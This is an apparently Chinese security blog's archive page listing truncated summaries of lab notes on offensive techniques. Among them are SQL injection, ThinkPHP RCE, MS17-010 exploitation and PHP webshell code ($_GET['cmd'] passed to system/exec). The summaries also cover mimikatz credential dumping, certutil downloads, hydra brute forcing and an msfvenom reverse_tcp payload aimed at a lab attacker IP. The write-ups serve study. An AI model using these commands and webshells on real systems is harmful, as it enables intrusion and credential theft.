02 2020 档案
摘要:伪造mysql服务端实现任意文件读取 前几天在看文章时发现了一个新的知识点,所以来记录一下,原文章在获得数据库的账号密码之后,利用脚本读取任意文件 复现 LOAD DATE LOCAL INFILE可以把文件读取到数据库的某个表中,这样可以在phpmyadmin中执行 load data local
阅读全文
摘要:漏洞成因 当数据库进行查询时,会自动将空格去除掉 演示 SELECT * FROM `user` WHERE username = 'admin1' SELECT * FROM `user` WHERE username = 'admin1 ' 在数据库中分别执行上面两条SQL语句,很明显,第二条S
阅读全文
摘要:攻击机:kali 192.168.3.139 目标机:windows7 192.168.3.130 启动msf,搜索和ms17-010相关的脚本 设置脚本,并且查看参数,这里只需要设置一下目标ip,set rhosts 192.168.3.130 然后设置监听脚本 set payload windo
阅读全文
摘要:Thinkphp5.0.x环境搭建 直接将源码解压就行,访问public目录即可,例如http://127.0.0.1/cms/thinkphp/public Thinkphp5.0.x远程代码执行 payload:http://127.0.0.1/cms/thinkphp/public/index
阅读全文
摘要:因为菜刀没有自带的代理设置,所以需要借用proxifier和burpsuite抓流量 先配置proxifier和burpsuite: 然后找到菜刀,右键proxifier => proxifier https 127.0.0.1 然后菜刀访问webshell即可: 先访问admin目录: POST
阅读全文
摘要:Centos7 192.168.3.143 一、安装apache 安装apache:yum install httpd httpd-devel 启动apache服务:systemctl start httpd 设置apache开机自启:systemctl enable httpd 查看服务状态: s
阅读全文
摘要:一、file:// 用于访问本地系统文件,需要知道文件的绝对路径 1 <?php 2 include($_GET['file']); 3 ?>然后传参http://127.0.0.1/1/php.php?file=file://D:\\phpstudy_pro\\WWW\\c.txt 二、 php:
阅读全文
摘要:新手入门,用来记一些笔记,大佬别喷。下面记录几个PHP里面可以执行系统命令的函数。 system() <?php $a = $_GET['cmd']; system($a); ?> exec() <?php $a = $_GET['cmd']; echo exec($a); ?> passthru(
阅读全文
摘要:今天西南民大的老哥,发我一道i春秋上的题,题目名字over the hill,然后就有了这篇,也是第一篇。 先介绍一下hill,Hill 密码是一种多字母代替密码。Hill 密码要求首先将明文分成同等规模的若干个分组(最后一个分组不足时需要填充),每一个分组被整体加密变换,即 Hill 密码属于分组
阅读全文
摘要:schtasks 例子1: schtasks /create /tn "123" /tr "calc.exe" /sc onlogon 创建一个名字是123的计划任务,在每次管理员登录时,启动计算器。 例子2: schtasks /Create /TN 123 /SC DAILY /ST 01:02
阅读全文
摘要:certutil.exe 这里用虚拟机开一个网站(http://192.168.3.128),假设外网网站,用本机(192.168.3.1) 来实验。 下载 certutil -urlcache -split -f 文件链接 自定义文件名 下载完之后会有一个缓存,删除缓存 certutil -url
阅读全文
摘要:实验环境:windwos server 2003 一般windwos下新建用户并加到管理员组: net user test /add net localgroup adminitrators test /add 这种情况下直接cmd下执行net user就会被看到新建的用户,比较容易被发现。 简单的
阅读全文
摘要:目标机 windows server 2008 R2 第一种方法: cmd下运行mimikatz.exe,然后依次输入下面命令 privilege::debug sekurlsa::logonpasswords 成功抓到服务器密码 第二种方法: 下载个procdump,https://docs.mi
阅读全文
摘要:hydra 暴力破解工具,可爆破很多服务,例如开机用户名密码 1、破解ssh: hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh 2、破解ftp: hydra i
阅读全文
摘要:GET注入 sqlmap.py -u "url" 检测存在不存在注入 sqlmap.py -u "url" --tables 列出数据库的表 sqlmap.py -u "url" --columns -T admin 列出admin的内容 sqlmap.py -u "url" --dump -T a
阅读全文
摘要:二次注入原理 二次注入可以理解成,攻击者先将攻击语句插入到数据库中,然后再调用攻击语句,完成攻击。 下面自己搭建环境复现一下 先在reg,php去插入攻击语句,username处语句为' union select 1,user(),3# (这里后面的数字只要小于等于列数 就可以,因为reg.php中
阅读全文
摘要:宽字节注入原理 当数据库编码方式为gdk时,一个汉字会占用两个字节,平常字符会占一个字节 例如:你 url编码之后为 => %c4%e3 # url编码之后为 => %23 ' url编码之后为 => %27 \ url编码之后为 => %5c addslashes函数防止sql注入,将传入参数值进
阅读全文
摘要:简单记一下看见的五种写有sql注入的情况下如何写shell 原文链接:https://manning23.github.io/2019/07/23/MYSQL%E5%AD%98%E5%9C%A8%E6%B3%A8%E5%85%A5%E7%82%B9%EF%BC%8C%E5%86%99WebShell
阅读全文
摘要:level 1 查看第一关的源码,发现get方法直接输入的内容,可以直接构造payload payload:<script>alert(/xss/)</script> level 2 第二关和第一关有点不一样的地方在于传入的字符串多了一个单引号,应该先闭合单引号。 payload:"><script
阅读全文
摘要:pass-01 尝试上传一个php,发现提示不行。 前端js拦截了,先将php文件后缀改为允许的格式,比如jpg,burp抓包改一下就好了。后缀改为php成功上传。 访问发现上传成功。 pass-02 观察第二关的源码,发现判断content-type。 依旧burp抓包,修改content-typ
阅读全文
摘要:ps:当时出的时候就复现了,但是由于种种原因(当初粗心,没好好留意)没有成功,今天终于成功了 目前已知受影响的phpstudy版本 phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 这里用phpstudy
阅读全文
摘要:最近想复现一些漏洞并分析,打算从phpmyadmin开始。 先搭建环境 phpmyadmin版本:4.0.3 php版本:5.2.17 利用条件: 登陆后台(个人感觉鸡肋),需要截断 上级目录下放一个test.txt,内容是<? phpinfo(); ?> poc:http://localhost/
阅读全文
摘要:kali : 192.168.3.136 windows server 2012 : 192.168.3.129 1、生成一个exe远控 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.136 LPORT=12345 -f ex
阅读全文
摘要:alias Linux alias命令用于设置指令的别名。 用户可利用alias,自定指令的别名。若仅输入alias,则可列出目前所有的别名设置。alias的效力仅及于该次登入的操作。若要每次登入是即自动设好别名,可在.profile或.cshrc中设定指令的别名。 alias[别名]=[指令名称]
阅读全文
摘要:long long ago准备安装github时,输入 sudo apt-get install 后出现了如下的错误提示: E: 无法获得锁/var/lib/dpkg/lock - open (11: 资源暂时不可用)E: 无法锁定管理目录(/var/lib/dpkg/),是否有其他进程正占用它?
阅读全文
摘要:新手入门,用来记一些笔记,大佬别喷。下面记录几个PHP里面可以执行系统命令的函数。 system() <?php $a = $_GET['cmd']; system($a); ?> exec() <?php $a = $_GET['cmd']; echo exec($a); ?> passthru(
阅读全文
摘要:一、导入dns模块时一直出错,后来老哥提醒,python里一些模块名字不一样,dns模块的名字是dnspython,然后pip install dnspython成功 二、selenium无法打开火狐浏览器问题解决 今天第一次学习selenium这个库,在刚开始打开浏览器就踩坑,无法打开浏览器。 h
阅读全文
摘要://主要是阿里云默认密码,太恶心了,那么难记,哎,改了改了。 首先,先切换成mysql数据库,然后查询一下用户。然后开始踩坑。 网上百度的,mysql数据库更改密码,然后果然报错了。 update user set pasword=password("12345") where user="root
阅读全文
浙公网安备 33010602011771号